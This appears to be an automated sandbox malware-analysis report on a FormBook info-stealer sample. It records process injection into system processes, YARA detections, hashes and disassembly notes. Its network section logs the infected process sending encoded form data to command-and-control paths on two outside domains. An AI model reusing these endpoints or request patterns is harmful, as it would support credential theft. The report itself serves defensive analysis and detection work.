                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                    X-nginx-cache: WordPress
                                                                                                                    Content-Length: 12947
                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    42 | 192.168.2.4 | 49661 | 162.241.244.106 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:21:56.519336939 CEST | 745 | OUT | POST /hya5/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.mommymode.site
                                                                                                                    Origin: http://www.mommymode.site
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.mommymode.site/hya5/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 70 44 67 47 65 44 73 38 59 6c 37 6e 47 69 47 6a 64 37 63 52 49 5a 59 43 6b 65 64 36 45 79 30 76 43 58 38 45 30 71 37 32 50 58 50 4c 53 4d 69 73 65 4d 30 72 79 5a 31 4f 31 35 75 6d 45 5a 61 75 2b 73 71 33 43 66 78 68 55 48 77 6f 59 56 64 32 71 55 6a 63 61 33 69 66 4d 31 36 63 57 49 59 61 51 65 62 77 70 66 75 77 78 74 56 6b 5a 6a 4f 31 69 4c 4d 71 30 38 55 66 6d 42 62 4e 35 34 4d 78 45 39 2f 77 50 62 39 4f 5a 53 64 55 71 30 79 53 76 4f 5a 2b 63 47 69 61 6d 2f 7a 72 74 72 35 72 67 4a 75 78 4f 63 36 4f 72 38 31 42 77 5a 6c 65 4e 41 47 71 5a 67 6f 66 32 32 4c 6a 7a 35 57 78 64 35 65 47 49 6b 2b 73 71 65 2b 47 64 36 41 35 77 71 37 5a 59 36 67 3d
                                                                                                                    Data Ascii: AHkx=pDgGeDs8Yl7nGiGjd7cRIZYCked6Ey0vCX8E0q72PXPLSMiseM0ryZ1O15umEZau+sq3CfxhUHwoYVd2qUjca3ifM16cWIYaQebwpfuwxtVkZjO1iLMq08UfmBbN54MxE9/wPb9OZSdUq0ySvOZ+cGiam/zrtr5rgJuxOc6Or81BwZleNAGqZgof22Ljz5Wxd5eGIk+sqe+Gd6A5wq7ZY6g=
                                                                                                                    Oct 9, 2024 14:21:57.326114893 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                    X-nginx-cache: WordPress
                                                                                                                    Content-Length: 12947
                                                                                                                    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49662 | 162.241.244.106 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:21:59.067800999 CEST | 10827 | OUT | POST /hya5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.mommymode.site
Origin: http://www.mommymode.site
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10301
Referer: http://www.mommymode.site/hya5/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:21:59.854446888 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 12:21:59 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade
Vary: Accept-Encoding
Content-Encoding: gzip
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
X-Newfold-Cache-Level: 2
X-Endurance-Cache-Level: 2
X-nginx-cache: WordPress
Content-Length: 12947
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49663 | 162.241.244.106 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:22:01.610969067 CEST | 464 | OUT | GET /hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n+tt0DF04aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzVCSMG3zCGblVdbb3qd6x39FLIiPv6fMrlbs= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.mommymode.site
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:22:02.429029942 CEST | 622 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 09 Oct 2024 12:22:02 GMT
Server: nginx/1.25.5
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://mommymode.site/hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n+tt0DF04aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzVCSMG3zCGblVdbb3qd6x39FLIiPv6fMrlbs=
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
X-Newfold-Cache-Level: 2
X-Endurance-Cache-Level: 2
X-nginx-cache: WordPress
X-Server-Cache: true
X-Proxy-Cache: MISS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49671 | 199.59.243.227 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:22:09.188841105 CEST | 731 | OUT | POST /nuqv/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.polarmuseum.info
Origin: http://www.polarmuseum.info
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
Referer: http://www.polarmuseum.info/nuqv/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=Ro5YetqHlmk8BLDGO+MwiC+RWR+nKTTwm8G2UWTqGrCVNJAn6hEJfMUDBm/4Qj561Chydlu9Md6zJSMUUu6HvCLfLO39sCjJ0RRZAJ0rFA1Up+8OewdUodTsRhE/TevevnIBorDIxvn5z+kRFzsiz2OrplVuG3lAQfVoFS0im3A+1TjZ7MfMxNPN8UQRpW8cGw==
Oct 9, 2024 14:22:09.653481960 CEST | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 09 Oct 2024 12:22:09 GMT
content-type: text/html; charset=utf-8
content-length: 1130
x-request-id: b2c53ab8-d411-46f0-9cf6-21c84a388545
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
set-cookie: parking_session=b2c53ab8-d411-46f0-9cf6-21c84a388545; expires=Wed, 09 Oct 2024 12:37:09 GMT; path=/
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.4 | 49672 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:22:11.739000082 CEST | 751 | OUT | POST /nuqv/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.polarmuseum.info
                                                                                                                    Origin: http://www.polarmuseum.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.polarmuseum.info/nuqv/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:22:12.189127922 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Wed, 09 Oct 2024 12:22:11 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1130
                                                                                                                    x-request-id: e7e56816-8276-4080-9a8c-c998f3a467aa
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
                                                                                                                    set-cookie: parking_session=e7e56816-8276-4080-9a8c-c998f3a467aa; expires=Wed, 09 Oct 2024 12:37:12 GMT; path=/
                                                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49673 | 199.59.243.227 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:22:14.289009094 CEST | 10833 | OUT | POST /nuqv/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.polarmuseum.info
                                                                                                                    Origin: http://www.polarmuseum.info
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.polarmuseum.info/nuqv/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:22:14.726465940 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Wed, 09 Oct 2024 12:22:14 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1130
                                                                                                                    x-request-id: 95a20d4f-d213-4312-a12e-b1a0341d6adf
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
                                                                                                                    set-cookie: parking_session=95a20d4f-d213-4312-a12e-b1a0341d6adf; expires=Wed, 09 Oct 2024 12:37:14 GMT; path=/
                                                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49674 | 199.59.243.227 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:22:16.832210064 CEST | 466 | OUT | GET /nuqv/?AHkx=cqR4daz/40w4b6reEtYQuTL/A0OxFlThnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvw1T8M+Okxh6a/XFlGr4hKR5quINsThV8goc=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.polarmuseum.info
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:22:17.289824009 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Wed, 09 Oct 2024 12:22:16 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1486
                                                                                                                    x-request-id: 27fb0db6-771a-4fc3-8158-a7c0dc03670a
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XbWxhFSXbAFNW4a2yZllsfiJgCAlQoLGN//XLyHJZ256n/ol7Jp5giGeqxeruD6cXTvIRMT5lLB8TEuNq8YubQ==
                                                                                                                    set-cookie: parking_session=27fb0db6-771a-4fc3-8158-a7c0dc03670a; expires=Wed, 09 Oct 2024 12:37:17 GMT; path=/
                                                                                                                    connection: close


                                                                                                                    Target ID:0
                                                                                                                    Start time:08:18:25
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\w64HYOhfv1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\w64HYOhfv1.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'363'343 bytes
                                                                                                                    MD5 hash:AC184C685020CEFF107E43CABBA13B4F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:08:18:31
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\w64HYOhfv1.exe"
                                                                                                                    Imagebase:0x40000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:08:18:44
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:6
                                                                                                                    Start time:08:18:48
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                                                                                                                    Imagebase:0xe30000
                                                                                                                    File size:15'360 bytes
                                                                                                                    MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:7
                                                                                                                    Start time:08:19:00
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:08:19:13
                                                                                                                    Start date:09/10/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:8.5%
                                                                                                                      Total number of Nodes:129
                                                                                                                      Total number of Limit Nodes:8

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CsKC
                                                                                                                      • API String ID: 0-34240546
                                                                                                                      • Opcode ID: c435e3ca53404a323a441e18227f1c5012eb27aad88ca523be44ef7be3a75275
                                                                                                                      • Instruction ID: 9c0765f4ab745e0fab6488cf2bf6e8ce379bbe2e1bfd5947cbdac7acb128d1d8
                                                                                                                      • Opcode Fuzzy Hash: c435e3ca53404a323a441e18227f1c5012eb27aad88ca523be44ef7be3a75275
                                                                                                                      • Instruction Fuzzy Hash: ADF1A070D0021AAFDF24DFA4DC88ABEB7B9AF44304F1482ADE405A7240D7719E45DFA5

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 213 2677583-267759f 214 26775a7-26775ac 213->214 215 26775a2 call 268f1c3 213->215 216 26775b2-26775c0 call 268f7c3 214->216 217 26775ae-26775b1 214->217 215->214 220 26775c2-26775cd call 268fa63 216->220 221 26775d0-26775e1 call 268db63 216->221 220->221 226 26775e3-26775f7 LdrLoadDll 221->226 227 26775fa-26775fd 221->227 226->227
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026775F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction ID: 45ad219197a848e99451a4ac3b922c7944c252f3f0530b2a6224611ce1ed465d
                                                                                                                      • Opcode Fuzzy Hash: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction Fuzzy Hash: 930121B5D0020DABDF10EBE4DC81F9DB7789B44304F0042A9E90897240FA31E754CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 238 268c433-268c46f call 2664853 call 268d653 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0268C46A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction ID: 30b5c012fe67c74ab11997d091b59f8d615109012a002e647af3e52e82c9cd31
                                                                                                                      • Opcode Fuzzy Hash: 25d4ae8e20885b246a0b33a202f6818839664ef0674a9c243f9a03256c03aea3
                                                                                                                      • Instruction Fuzzy Hash: 42E046362402487BD220AA69DC04FAB776DDBC5B50F008029FA1CA7242CAB1B9418AB5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 252 3072b60-3072b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
